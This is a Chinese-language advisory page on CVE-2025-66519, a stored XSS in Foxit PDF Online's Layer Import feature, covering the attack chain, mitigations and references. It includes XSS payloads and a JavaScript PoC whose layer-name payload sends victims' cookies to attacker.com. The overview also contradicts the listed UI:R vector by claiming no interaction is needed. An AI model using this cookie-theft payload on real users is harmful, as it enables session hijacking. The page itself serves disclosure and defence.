CVE-2025-66519: Foxit PDF Online Layer Import存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66519

漏洞类型

存储型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

pdfonline.foxit.com (Foxit PDF Online)

漏洞概述

CVE-2025-66519是Foxit PDF Online服务中存在的存储型跨站脚本（Stored XSS）漏洞，CVSS评分6.3，属于中危级别。该漏洞位于pdfonline.foxit.com的Layer Import（图层导入）功能中。攻击者可以通过在“Create new Layer”（创建新图层）字段中注入恶意JavaScript脚本载荷，该载荷会被持久化存储在服务器端。当其他用户访问并打开Layers面板时，存储的恶意脚本会被渲染到页面DOM中无需任何用户交互即可自动执行。成功利用此漏洞的攻击者可以窃取受害者的会话Cookie、劫持用户账户、执行任意客户端操作或进行钓鱼攻击。由于漏洞需要低权限认证且攻击复杂度较低，对使用该平台的企业和个人用户构成一定安全风险。

技术细节

该存储型XSS漏洞存在于Foxit PDF Online的Layer Import功能模块。攻击者首先需要具备该平台的低权限账户，然后通过上传或导入功能在“Create new Layer”字段中注入恶意载荷。恶意载荷示例：<img src=x onerror=alert(document.cookie)>。当图层数据被保存后，服务器未对用户输入进行充分的HTML转义或消毒处理，导致恶意脚本被存储在后端数据库中。当其他用户访问受影响的PDF文档并打开Layers面板时，浏览器会从服务器获取包含恶意脚本的图层数据并直接渲染到DOM中，触发脚本执行。由于该脚本在受害者的浏览器上下文中执行，可以访问该域的所有Cookie（除HttpOnly标记外）、localStorage等敏感信息，并可以代表受害者执行操作。攻击者通常利用此漏洞窃取认证凭证或进一步进行横向移动。

攻击链分析

STEP 1

步骤1

攻击者注册并登录Foxit PDF Online平台，获取低权限账户

STEP 2

步骤2

攻击者创建或上传PDF文档，进入Layer Import功能

STEP 3

步骤3

在Create new Layer字段中注入恶意XSS载荷（如<img src=x onerror=alert(1)>）

STEP 4

步骤4

服务器未对输入进行消毒，恶意载荷被存储在后端数据库

STEP 5

步骤5

受害者访问同一文档并打开Layers面板，触发存储型XSS执行

STEP 6

步骤6

恶意脚本在受害者浏览器中执行，窃取Cookie或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66519 PoC - Stored XSS in Foxit PDF Online Layer Import // Target: pdfonline.foxit.com Layer Import functionality const targetUrl = 'https://pdfonline.foxit.com'; // Malicious payload for Layer name field const xssPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">\n'; // Step 1: Authenticate with low-privilege account async function authenticate() { const loginUrl = `${targetUrl}/auth/login`; // Replace with valid credentials const credentials = { username: '[email protected]', password: 'password123' }; const response = await fetch(loginUrl, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(credentials), credentials: 'include' }); return response.ok; } // Step 2: Create document and inject XSS via Layer Import async function injectXSS() { // Upload PDF or create new document const uploadUrl = `${targetUrl}/api/documents/upload`; // Intercept layer import request and modify layer name const layerData = { layerName: xssPayload, documentId: 'target-document-id', action: 'import' }; const response = await fetch(`${targetUrl}/api/layers/import`, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(layerData), credentials: 'include' }); return response.ok; } // Step 3: Trigger XSS when victim accesses Layers panel // Victim visits the document and opens Layers panel // The stored XSS payload executes automatically console.log('PoC for CVE-2025-66519'); console.log('Target:', targetUrl); console.log('Payload:', xssPayload);

影响范围

Foxit PDF Online (pdfonline.foxit.com) - Layer Import功能受影响

具体版本信息需参考Foxit官方安全公告

防御指南

临时缓解措施

在官方补丁发布前，建议暂时禁用Layer Import功能的文件上传和分享功能，限制不受信任用户的上传权限。同时可以部署WAF规则过滤常见的XSS载荷模式，并对相关功能进行代码审计确保所有用户输入都经过适当的消毒处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66519
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66519
3 Details https://www.cvedetails.com/cve/CVE-2025-66519/
4 VulDB https://vuldb.com/cve/CVE-2025-66519
5 Link https://www.foxit.com/support/security-bulletins.html